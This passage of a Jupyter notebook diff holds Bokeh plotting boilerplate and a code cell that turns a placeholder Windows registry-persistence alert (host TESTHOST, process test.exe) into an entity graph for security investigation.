detected\",\"text_font_size\":\"10pt\",\"x\":-0.3962678490735797,\"x_offset\":5,\"y\":-2.0,\"y_offset\":5},\"id\":\"1257\",\"type\":\"Label\"},{\"attributes\":{},\"id\":\"1247\",\"type\":\"MultiLine\"},{\"attributes\":{\"data_source\":{\"id\":\"1244\"},\"glyph\":{\"id\":\"1252\"},\"hover_glyph\":null,\"muted_glyph\":null,\"view\":{\"id\":\"1246\"}},\"id\":\"1245\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"data\":{\"end\":[\"TESTHOST\",\"test.exe\",\"test.exe\"],\"start\":[\"Alert: Windows registry persistence method detected\",\"Alert: Windows registry persistence method detected\",\"TESTHOST\"]},\"selected\":{\"id\":\"1302\"},\"selection_policy\":{\"id\":\"1303\"}},\"id\":\"1248\",\"type\":\"ColumnDataSource\"},{\"attributes\":{},\"id\":\"1283\",\"type\":\"AllLabels\"},{\"attributes\":{\"data_source\":{\"id\":\"1248\"},\"glyph\":{\"id\":\"1247\"},\"hover_glyph\":null,\"muted_glyph\":null,\"view\":{\"id\":\"1250\"}},\"id\":\"1249\",\"type\":\"GlyphRenderer\"},{\"attributes\":{},\"id\":\"1229\",\"type\":\"SaveTool\"},{\"attributes\":{\"formatter\":{\"id\":\"1297\"},\"major_label_policy\":{\"id\":\"1296\"},\"ticker\":{\"id\":\"1219\"}},\"id\":\"1218\",\"type\":\"LinearAxis\"},{\"attributes\":{},\"id\":\"1284\",\"type\":\"BasicTickFormatter\"},{\"attributes\":{\"source\":{\"id\":\"1248\"}},\"id\":\"1250\",\"type\":\"CDSView\"},{\"attributes\":{\"end\":3,\"start\":-3},\"id\":\"1212\",\"type\":\"Range1d\"}],\"root_ids\":[\"1207\"]},\"title\":\"Bokeh Application\",\"version\":\"2.3.3\"}};\n  var render_items = [{\"docid\":\"a9828928-19df-459c-95e5-a2f6a5c8ee70\",\"root_ids\":[\"1207\"],\"roots\":{\"1207\":\"2832ca00-b2ab-4803-8cbd-15723fba51ad\"}}];\n  root.Bokeh.embed.embed_items_notebook(docs_json, render_items);\n\n  }\n  if (root.Bokeh !== undefined) {\n    embed_document(root);\n  } else {\n    var attempts = 0;\n    var timer = setInterval(function(root) {\n      if (root.Bokeh !== undefined) {\n        clearInterval(timer);\n        embed_document(root);\n      } else {\n        attempts++;\n        if (attempts > 100) {\n          clearInterval(timer);\n          console.log(\"Bokeh: ERROR: Unable to run BokehJS code because BokehJS library is missing\");\n        }\n      }\n    }, 10, root)\n  }\n})(window);",
+      "application/vnd.bokehjs_exec.v0+json": ""
+     },
+     "metadata": {
+      "application/vnd.bokehjs_exec.v0+json": {
+       "id": "1207"
+      }
+     },
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "<div style=\"display: table;\"><div style=\"display: table-row;\"><div style=\"display: table-cell;\"><b title=\"bokeh.plotting.figure.Figure\">Figure</b>(</div><div style=\"display: table-cell;\">id&nbsp;=&nbsp;'1207', <span id=\"1427\" style=\"cursor: pointer;\">&hellip;)</span></div></div><div class=\"1426\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">above&nbsp;=&nbsp;[],</div></div><div class=\"1426\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">align&nbsp;=&nbsp;'start',</div></div><div class=\"1426\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">aspect_ratio&nbsp;=&nbsp;None,</div></div><div class=\"1426\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">aspect_scale&nbsp;=&nbsp;1,</div></div><div class=\"1426\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">background&nbsp;=&nbsp;None,</div></div><div class=\"1426\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">background_fill_alpha&nbsp;=&nbsp;1.0,</div></div><div class=\"1426\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">background_fill_color&nbsp;=&nbsp;'#ffffff',</div></div><div class=\"1426\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">below&nbsp;=&nbsp;[LinearAxis(id='1218', ...)],</div></div><div class=\"1426\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">border_fill_alpha&nbsp;=&nbsp;1.0,</div></div><div class=\"1426\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">border_fill_color&nbsp;=&nbsp;'#ffffff',</div></div><div class=\"1426\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">center&nbsp;=&nbsp;[Grid(id='1221', ...), Grid(id='1225', ...), Label(id='1257', ...), Label(id='1258', ...), Label(id='1259', ...)],</div></div><div class=\"1426\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">css_classes&nbsp;=&nbsp;[],</div></div><div class=\"1426\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">disabled&nbsp;=&nbsp;False,</div></div><div class=\"1426\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">extra_x_ranges&nbsp;=&nbsp;{},</div></div><div class=\"1426\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">extra_y_ranges&nbsp;=&nbsp;{},</div></div><div class=\"1426\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">frame_height&nbsp;=&nbsp;None,</div></div><div class=\"1426\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">frame_width&nbsp;=&nbsp;None,</div></div><div class=\"1426\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">height&nbsp;=&nbsp;800,</div></div><div class=\"1426\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">height_policy&nbsp;=&nbsp;'auto',</div></div><div class=\"1426\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">hidpi&nbsp;=&nbsp;True,</div></div><div class=\"1426\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">inner_height&nbsp;=&nbsp;0,</div></div><div class=\"1426\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">inner_width&nbsp;=&nbsp;0,</div></div><div class=\"1426\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">js_event_callbacks&nbsp;=&nbsp;{},</div></div><div class=\"1426\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">js_property_callbacks&nbsp;=&nbsp;{},</div></div><div class=\"1426\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">left&nbsp;=&nbsp;[LinearAxis(id='1222', ...)],</div></div><div class=\"1426\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">lod_factor&nbsp;=&nbsp;10,</div></div><div class=\"1426\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">lod_interval&nbsp;=&nbsp;300,</div></div><div class=\"1426\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">lod_threshold&nbsp;=&nbsp;2000,</div></div><div class=\"1426\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">lod_timeout&nbsp;=&nbsp;500,</div></div><div class=\"1426\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">margin&nbsp;=&nbsp;(0, 0, 0, 0),</div></div><div class=\"1426\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">match_aspect&nbsp;=&nbsp;False,</div></div><div class=\"1426\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">max_height&nbsp;=&nbsp;None,</div></div><div class=\"1426\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">max_width&nbsp;=&nbsp;None,</div></div><div class=\"1426\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">min_border&nbsp;=&nbsp;5,</div></div><div class=\"1426\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">min_border_bottom&nbsp;=&nbsp;None,</div></div><div class=\"1426\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">min_border_left&nbsp;=&nbsp;None,</div></div><div class=\"1426\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">min_border_right&nbsp;=&nbsp;None,</div></div><div class=\"1426\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">min_border_top&nbsp;=&nbsp;None,</div></div><div class=\"1426\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">min_height&nbsp;=&nbsp;None,</div></div><div class=\"1426\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">min_width&nbsp;=&nbsp;None,</div></div><div class=\"1426\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">name&nbsp;=&nbsp;None,</div></div><div class=\"1426\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outer_height&nbsp;=&nbsp;0,</div></div><div class=\"1426\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outer_width&nbsp;=&nbsp;0,</div></div><div class=\"1426\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outline_line_alpha&nbsp;=&nbsp;1.0,</div></div><div class=\"1426\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outline_line_cap&nbsp;=&nbsp;'butt',</div></div><div class=\"1426\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outline_line_color&nbsp;=&nbsp;'#e5e5e5',</div></div><div class=\"1426\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outline_line_dash&nbsp;=&nbsp;[],</div></div><div class=\"1426\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outline_line_dash_offset&nbsp;=&nbsp;0,</div></div><div class=\"1426\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outline_line_join&nbsp;=&nbsp;'bevel',</div></div><div class=\"1426\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outline_line_width&nbsp;=&nbsp;1,</div></div><div class=\"1426\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">output_backend&nbsp;=&nbsp;'canvas',</div></div><div class=\"1426\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">renderers&nbsp;=&nbsp;[GraphRenderer(id='1242', ...)],</div></div><div class=\"1426\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">reset_policy&nbsp;=&nbsp;'standard',</div></div><div class=\"1426\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">right&nbsp;=&nbsp;[],</div></div><div class=\"1426\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">sizing_mode&nbsp;=&nbsp;None,</div></div><div class=\"1426\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">subscribed_events&nbsp;=&nbsp;[],</div></div><div class=\"1426\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">syncable&nbsp;=&nbsp;True,</div></div><div class=\"1426\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">tags&nbsp;=&nbsp;[],</div></div><div class=\"1426\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">title&nbsp;=&nbsp;Title(id='1208', ...),</div></div><div class=\"1426\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">title_location&nbsp;=&nbsp;'above',</div></div><div class=\"1426\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">toolbar&nbsp;=&nbsp;Toolbar(id='1233', ...),</div></div><div class=\"1426\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">toolbar_location&nbsp;=&nbsp;'right',</div></div><div class=\"1426\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">toolbar_sticky&nbsp;=&nbsp;True,</div></div><div class=\"1426\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">visible&nbsp;=&nbsp;True,</div></div><div class=\"1426\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">width&nbsp;=&nbsp;800,</div></div><div class=\"1426\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">width_policy&nbsp;=&nbsp;'auto',</div></div><div class=\"1426\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">x_range&nbsp;=&nbsp;Range1d(id='1210', ...),</div></div><div class=\"1426\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">x_scale&nbsp;=&nbsp;LinearScale(id='1214', ...),</div></div><div class=\"1426\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">y_range&nbsp;=&nbsp;Range1d(id='1212', ...),</div></div><div class=\"1426\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">y_scale&nbsp;=&nbsp;LinearScale(id='1216', ...))</div></div></div>\n",
+       "<script>\n",
+       "(function() {\n",
+       "  var expanded = false;\n",
+       "  var ellipsis = document.getElementById(\"1427\");\n",
+       "  ellipsis.addEventListener(\"click\", function() {\n",
+       "    var rows = document.getElementsByClassName(\"1426\");\n",
+       "    for (var i = 0; i < rows.length; i++) {\n",
+       "      var el = rows[i];\n",
+       "      el.style.display = expanded ? \"none\" : \"table-row\";\n",
+       "    }\n",
+       "    ellipsis.innerHTML = expanded ? \"&hellip;)\" : \"&lsaquo;&lsaquo;&lsaquo;\";\n",
+       "    expanded = !expanded;\n",
+       "  });\n",
+       "})();\n",
+       "</script>\n"
+      ],
+      "text/plain": [
+       "Figure(id='1207', ...)"
+      ]
+     },
+     "execution_count": 4,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "sample_alert = {\n",
+    "    \"StartTimeUtc\": \"2018-09-27 16:59:16\",\n",
+    "    \"EndTimeUtc\": \"2018-09-27 16:59:16\",\n",
+    "    \"ProviderAlertId\": \"b6329e79-0a94-4035-beee-c2e2657b71e3\",\n",
+    "    \"SystemAlertId\": \"2518642332435550951_b6329e79-0a94-4035-beee-c2\",\n",
+    "    \"ProviderName\": \"Detection\",\n",
+    "    \"VendorName\": \"Microsoft\",\n",
+    "    \"AlertType\": \"RegistryPersistence\",\n",
+    "    \"AlertDisplayName\": \"Windows registry persistence method detected\",\n",
+    "    \"Severity\": \"Low\",\n",
+    "    \"IsIncident\": False,\n",
+    "    \"ExtendedProperties\": {\n",
+    "        \"resourceType\": \"Non-Azure Resource\"\n",
+    "    },\n",
+    "    \"CompromisedEntity\": \"TESTHOST\",\n",
+    "    \"Entities\": [\n",
+    "        {\n",
+    "            \"Type\": \"host\",\n",
+    "            \"$id\": \"1\",\n",
+    "            \"HostName\": \"TESTHOST\",\n",
+    "            \"DnsDomain\": \"DOM.CONTOSO.COM\",\n",
+    "            \"IsDomainJoined\": True,\n",
+    "            \"NTDomain\": \"DOM\",\n",
+    "            \"NetBiosName\": \"TESTHOST\",\n",
+    "            \"OsVersion\": None,\n",
+    "            \"OSFamily\": \"Windows\",\n",
+    "        },\n",
+    "        {\n",
+    "            \"Type\": \"process\",\n",
+    "            \"$id\": \"3\",\n",
+    "            \"CommandLine\": \"\",\n",
+    "            \"Host\": {\"$ref\": \"1\"},\n",
+    "            \"ProcessId\": \"0x940\",\n",
+    "            \"ImageFile\": \"test.exe\",\n",
+    "        },\n",
+    "    ],\n",
+    "    \"ConfidenceLevel\": \"Unknown\",\n",
+    "    \"ConfidenceScore\": None,\n",
+    "    \"ConfidenceReasons\": None,\n",
+    "    \"Intent\": \"Persistence\",\n",
+    "    \"ExtendedLinks\": None,\n",
+    "    \"AzureResourceId\": None,\n",
+    "    \"AzureResourceSubscriptionId\": None,\n",
+    "    \"TenantId\": \"b6329e79-0a94-4035-beee-c2e2657b71e3\",\n",
+    "    \"WorkspaceId\": \"b6329e79-0a94-4035-beee-c2e2657b71e3\",\n",
+    "    \"AgentId\": \"b6329e79-0a94-4035-beee-c2e2657b71e3\",\n",
+    "    \"SourceComputerId\": \"b6329e79-0a94-4035-beee-c2e2657b71e3\",\n",
+    "    \"SystemSource\": \"Non-Azure\",\n",
+    "    \"WorkspaceSubscriptionId\": \"b6329e79-0a94-4035-beee-c2e2657b71e3\",\n",
+    "    \"WorkspaceResourceGroup\": \"test-east-us\",\n",
+    "    \"TimeGeneratedUtc\": \"2018-09-27 16:59:47\",\n",
+    "}\n",
+    "alert = Alert(sample_alert)\n",
+    "\n",
+    "graph = EntityGraph(alert)\n",
+    "graph.plot()"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 5,
+   "metadata": {},
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "Exception reporting mode: Verbose\n"
+     ]
+    },
+    {
+     "data": {
+      "text/html": [
+       "\n",
+       "    <div class=\"bk-root\">\n",
+       "        <a href=\"https://bokeh.org\" target=\"_blank\" class=\"bk-logo bk-logo-small bk-logo-notebook\"></a>\n",
+       "        <span id=\"1429\">Loading BokehJS ...</span>\n",
+       "    </div>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/javascript": "\n(function(root) {\n  function now() {\n    return new Date();\n  }\n\n  var force = true;\n\n  if (typeof root._bokeh_onload_callbacks === \"undefined\" || force === true) {\n    root._bokeh_onload_callbacks = [];\n    root._bokeh_is_loading = undefined;\n  }\n\n  var JS_MIME_TYPE = 'application/javascript';\n  var HTML_MIME_TYPE = 'text/html';\n  var EXEC_MIME_TYPE = 'application/vnd.bokehjs_exec.v0+json';\n  var CLASS_NAME = 'output_bokeh rendered_html';\n\n  /**\n   * Render data to the DOM node\n   */\n  function render(props, node) {\n    var script = document.createElement(\"script\");\n    node.appendChild(script);\n  }\n\n  /**\n   * Handle when an output is cleared or removed\n   */\n  function handleClearOutput(event, handle) {\n    var cell = handle.cell;\n\n    var id = cell.output_area._bokeh_element_id;\n    var server_id = cell.output_area._bokeh_server_id;\n    // Clean up Bokeh references\n    if (id != null && id in Bokeh.index) {\n      Bokeh.index[id].model.document.clear();\n      delete Bokeh.index[id];\n    }\n\n    if (server_id !== undefined) {\n      // Clean up Bokeh references\n      var cmd = \"from bokeh.io.state import curstate; print(curstate().uuid_to_server['\" + server_id + \"'].get_sessions()[0].document.roots[0]._id)\";\n      cell.notebook.kernel.execute(cmd, {\n        iopub: {\n          output: function(msg) {\n            var id = msg.content.text.trim();\n            if (id in Bokeh.index) {\n              Bokeh.index[id].model.document.clear();\n              delete Bokeh.index[id];\n            }\n          }\n        }\n      });\n      // Destroy server and session\n      var cmd = \"import bokeh.io.notebook as ion; ion.destroy_server('\" + server_id + \"')\";\n      cell.notebook.kernel.execute(cmd);\n    }\n  }\n\n  /**\n   * Handle when a new output is added\n   */\n  function handleAddOutput(event, handle) {\n    var output_area = handle.output_area;\n    var output = handle.output;\n\n    // limit handleAddOutput to display_data with EXEC_MIME_TYPE content only\n    if ((output.output_type != \"display_data\") || (!Object.prototype.hasOwnProperty.call(output.data, EXEC_MIME_TYPE))) {\n      return\n    }\n\n    var toinsert = output_area.element.find(\".\" + CLASS_NAME.split(' ')[0]);\n\n    if (output.metadata[EXEC_MIME_TYPE][\"id\"] !== undefined) {\n      toinsert[toinsert.length - 1].firstChild.textContent = output.data[JS_MIME_TYPE];\n      // store reference to embed id on output_area\n      output_area._bokeh_element_id = output.metadata[EXEC_MIME_TYPE][\"id\"];\n    }\n    if (output.metadata[EXEC_MIME_TYPE][\"server_id\"] !== undefined) {\n      var bk_div = document.createElement(\"div\");\n      bk_div.innerHTML = output.data[HTML_MIME_TYPE];\n      var script_attrs = bk_div.children[0].attributes;\n      for (var i = 0; i < script_attrs.length; i++) {\n        toinsert[toinsert.length - 1].firstChild.setAttribute(script_attrs[i].name, script_attrs[i].value);\n        toinsert[toinsert.length - 1].firstChild.textContent = bk_div.children[0].textContent\n      }\n      // store reference to server id on output_area\n      output_area._bokeh_server_id = output.metadata[EXEC_MIME_TYPE][\"server_id\"];\n    }\n  }\n\n  function register_renderer(events, OutputArea) {\n\n    function append_mime(data, metadata, element) {\n      // create a DOM node to render to\n      var toinsert = this.create_output_subarea(\n        metadata,\n        CLASS_NAME,\n        EXEC_MIME_TYPE\n      );\n      this.keyboard_manager.register_events(toinsert);\n      // Render to node\n      var props = {data: data, metadata: metadata[EXEC_MIME_TYPE]};\n      render(props, toinsert[toinsert.length - 1]);\n      element.append(toinsert);\n      return toinsert\n    }\n\n    /* Handle when an output is cleared or removed */\n    events.on('clear_output.CodeCell', handleClearOutput);\n    events.on('delete.Cell', handleClearOutput);\n\n    /* Handle when a new output is added */\n    events.on('output_added.OutputArea', handleAddOutput);\n\n    /**\n     * Register the mime type and append_mime function with output_area\n     */\n    OutputArea.prototype.register_mime_type(EXEC_MIME_TYPE, append_mime, {\n      /* Is output safe? */\n      safe: true,\n      /* Index of renderer in `output_area.display_order` */\n      index: 0\n    });\n  }\n\n  // register the mime type if in Jupyter Notebook environment and previously unregistered\n  if (root.Jupyter !== undefined) {\n    var events = require('base/js/events');\n    var OutputArea = require('notebook/js/outputarea').OutputArea;\n\n    if (OutputArea.prototype.mime_types().indexOf(EXEC_MIME_TYPE) == -1) {\n      register_renderer(events, OutputArea);\n    }\n  }\n\n  \n  if (typeof (root._bokeh_timeout) === \"undefined\" || force === true) {\n    root._bokeh_timeout = Date.now() + 5000;\n    root._bokeh_failed_load = false;\n  }\n\n  var NB_LOAD_WARNING = {'data': {'text/html':\n     \"<div style='background-color: #fdd'>\\n\"+\n     \"<p>\\n\"+\n     \"BokehJS does not appear to have successfully loaded. If loading BokehJS from CDN, this \\n\"+\n     \"may be due to a slow or bad network connection. Possible fixes:\\n\"+\n     \"</p>\\n\"+\n     \"<ul>\\n\"+\n     \"<li>re-rerun `output_notebook()` to attempt to load from CDN again, or</li>\\n\"+\n     \"<li>use INLINE resources instead, as so:</li>\\n\"+\n     \"</ul>\\n\"+\n     \"<code>\\n\"+\n     \"from bokeh.resources import INLINE\\n\"+\n     \"output_notebook(resources=INLINE)\\n\"+\n     \"</code>\\n\"+\n     \"</div>\"}};\n\n  function display_loaded() {\n    var el = document.getElementById(\"1429\");\n    if (el != null) {\n      el.textContent = \"BokehJS is loading...\";\n    }\n    if (root.Bokeh !== undefined) {\n      if (el != null) {\n        el.textContent = \"BokehJS \" + root.Bokeh.version + \" successfully loaded.\";\n      }\n    } else if (Date.now() < root._bokeh_timeout) {\n      setTimeout(display_loaded, 100)\n    }\n  }\n\n\n  function run_callbacks() {\n    try {\n      root._bokeh_onload_callbacks.forEach(function(callback) {\n        if (callback != null)\n          callback();\n      });\n    } finally {\n      delete root._bokeh_onload_callbacks\n    }\n    console.debug(\"Bokeh: all callbacks have finished\");\n  }\n\n  function load_libs(css_urls, js_urls, callback) {\n    if (css_urls == null) css_urls = [];\n    if (js_urls == null) js_urls = [];\n\n    root._bokeh_onload_callbacks.push(callback);\n    if (root._bokeh_is_loading > 0) {\n      console.debug(\"Bokeh: BokehJS is being loaded, scheduling callback at\", now());\n      return null;\n    }\n    if (js_urls == null || js_urls.length === 0) {\n      run_callbacks();\n      return null;\n    }\n    console.debug(\"Bokeh: BokehJS not loaded, scheduling load and callback at\", now());\n    root._bokeh_is_loading = css_urls.length + js_urls.length;\n\n    function on_load() {\n      root._bokeh_is_loading--;\n      if (root._bokeh_is_loading === 0) {\n        console.debug(\"Bokeh: all BokehJS libraries/stylesheets loaded\");\n        run_callbacks()\n      }\n    }\n\n    function on_error(url) {\n      console.error(\"failed to load \" + url);\n    }\n\n    for (let i = 0; i < css_urls.length; i++) {\n      const url = css_urls[i];\n      const element = document.createElement(\"link\");\n      element.onload = on_load;\n      element.onerror = on_error.bind(null, url);\n      element.rel = \"stylesheet\";\n      element.type = \"text/css\";\n      element.href = url;\n      console.debug(\"Bokeh: injecting link tag for BokehJS stylesheet: \", url);\n      document.body.appendChild(element);\n    }\n\n    const hashes = {\"https://cdn.bokeh.org/bokeh/release/bokeh-2.3.3.min.js\": \"dM3QQsP+wXdHg42wTqW85BjZQdLNNIXqlPw/BgKoExPmTG7ZLML4EGqLMfqHT6ON\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.3.3.min.js\": \"8x57I4YuIfu8XyZfFo0XVr2WAT8EK4rh/uDe3wF7YuW2FNUSNEpJbsPaB1nJ2fz2\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.3.3.min.js\": \"3QTqdz9LyAm2i0sG5XTePsHec3UHWwVsrOL68SYRoAXsafvfAyqtQ+h440+qIBhS\"};\n\n    for (let i = 0; i < js_urls.length; i++) {\n      const url = js_urls[i];\n      const element = document.createElement('script');\n      element.onload = on_load;\n      element.onerror = on_error.bind(null, url);\n      element.async = false;\n      element.src = url;\n      if (url in hashes) {\n        element.crossOrigin = \"anonymous\";\n        element.integrity = \"sha384-\" + hashes[url];\n      }\n      console.debug(\"Bokeh: injecting script tag for BokehJS library: \", url);\n      document.head.appendChild(element);\n    }\n  };\n\n  function inject_raw_css(css) {\n    const element = document.createElement(\"style\");\n    element.appendChild(document.createTextNode(css));\n    document.body.appendChild(element);\n  }\n\n  \n  var js_urls = [\"https://cdn.bokeh.org/bokeh/release/bokeh-2.3.3.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.3.3.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.3.3.min.js\"];\n  var css_urls = [];\n  \n\n  var inline_js = [\n    function(Bokeh) {\n      Bokeh.set_log_level(\"info\");\n    },\n    function(Bokeh) {\n    \n    \n    }\n  ];\n\n  function run_inline_js() {\n    \n    if (root.Bokeh !== undefined || force === true) {\n      \n    for (var i = 0; i < inline_js.length; i++) {\n      inline_js[i].call(root, root.Bokeh);\n    }\n    if (force === true) {\n        display_loaded();\n      }} else if (Date.now() < root._bokeh_timeout) {\n      setTimeout(run_inline_js, 100);\n    } else if (!root._bokeh_failed_load) {\n      console.log(\"Bokeh: BokehJS failed to load within specified timeout.\");\n      root._bokeh_failed_load = true;\n    } else if (force !== true) {\n      var cell = $(document.getElementById(\"1429\")).parents('.cell').data().cell;\n      cell.output_area.append_execute_result(NB_LOAD_WARNING)\n    }\n\n  }\n\n  if (root._bokeh_is_loading === 0) {\n    console.debug(\"Bokeh: BokehJS loaded, going straight to plotting\");\n    run_inline_js();\n  } else {\n    load_libs(css_urls, js_urls, function() {\n      console.debug(\"Bokeh: BokehJS plotting callback run at\", now());\n      run_inline_js();\n    });\n  }\n}(window));",
+      "application/vnd.bokehjs_load.v0+json": ""
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "\n",
+       "    <div class=\"bk-root\">\n",
+       "        <a href=\"https://bokeh.org\" target=\"_blank\" class=\"bk-logo bk-logo-small bk-logo-notebook\"></a>\n",
+       "        <span id=\"1430\">Loading BokehJS ...</span>\n",
+       "    </div>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/javascript": "\n(function(root) {\n  function now() {\n    return new Date();\n  }\n\n  var force = true;\n\n  if (typeof root._bokeh_onload_callbacks === \"undefined\" || force === true) {\n    root._bokeh_onload_callbacks = [];\n    root._bokeh_is_loading = undefined;\n  }\n\n  var JS_MIME_TYPE = 'application/javascript';\n  var HTML_MIME_TYPE = 'text/html';\n  var EXEC_MIME_TYPE = 'application/vnd.bokehjs_exec.v0+json';\n  var CLASS_NAME = 'output_bokeh rendered_html';\n\n  /**\n   * Render data to the DOM node\n   */\n  function render(props, node) {\n    var script = document.createElement(\"script\");\n    node.appendChild(script);\n  }\n\n  /**\n   * Handle when an output is cleared or removed\n   */\n  function handleClearOutput(event, handle) {\n    var cell = handle.cell;\n\n    var id = cell.output_area._bokeh_element_id;\n    var server_id = cell.output_area._bokeh_server_id;\n    // Clean up Bokeh references\n    if (id != null && id in Bokeh.index) {\n      Bokeh.index[id].model.document.clear();\n      delete Bokeh.index[id];\n    }\n\n    if (server_id !== undefined) {\n      // Clean up Bokeh references\n      var cmd = \"from bokeh.io.state import curstate; print(curstate().uuid_to_server['\" + server_id + \"'].get_sessions()[0].document.roots[0]._id)\";\n      cell.notebook.kernel.execute(cmd, {\n        iopub: {\n          output: function(msg) {\n            var id = msg.content.text.trim();\n            if (id in Bokeh.index) {\n              Bokeh.index[id].model.document.clear();\n              delete Bokeh.index[id];\n            }\n          }\n        }\n      });\n      // Destroy server and session\n      var cmd = \"import bokeh.io.notebook as ion; ion.destroy_server('\" + server_id + \"')\";\n      cell.notebook.kernel.execute(cmd);\n    }\n  }\n\n  /**\n   * Handle when a new output is added\n   */\n  function 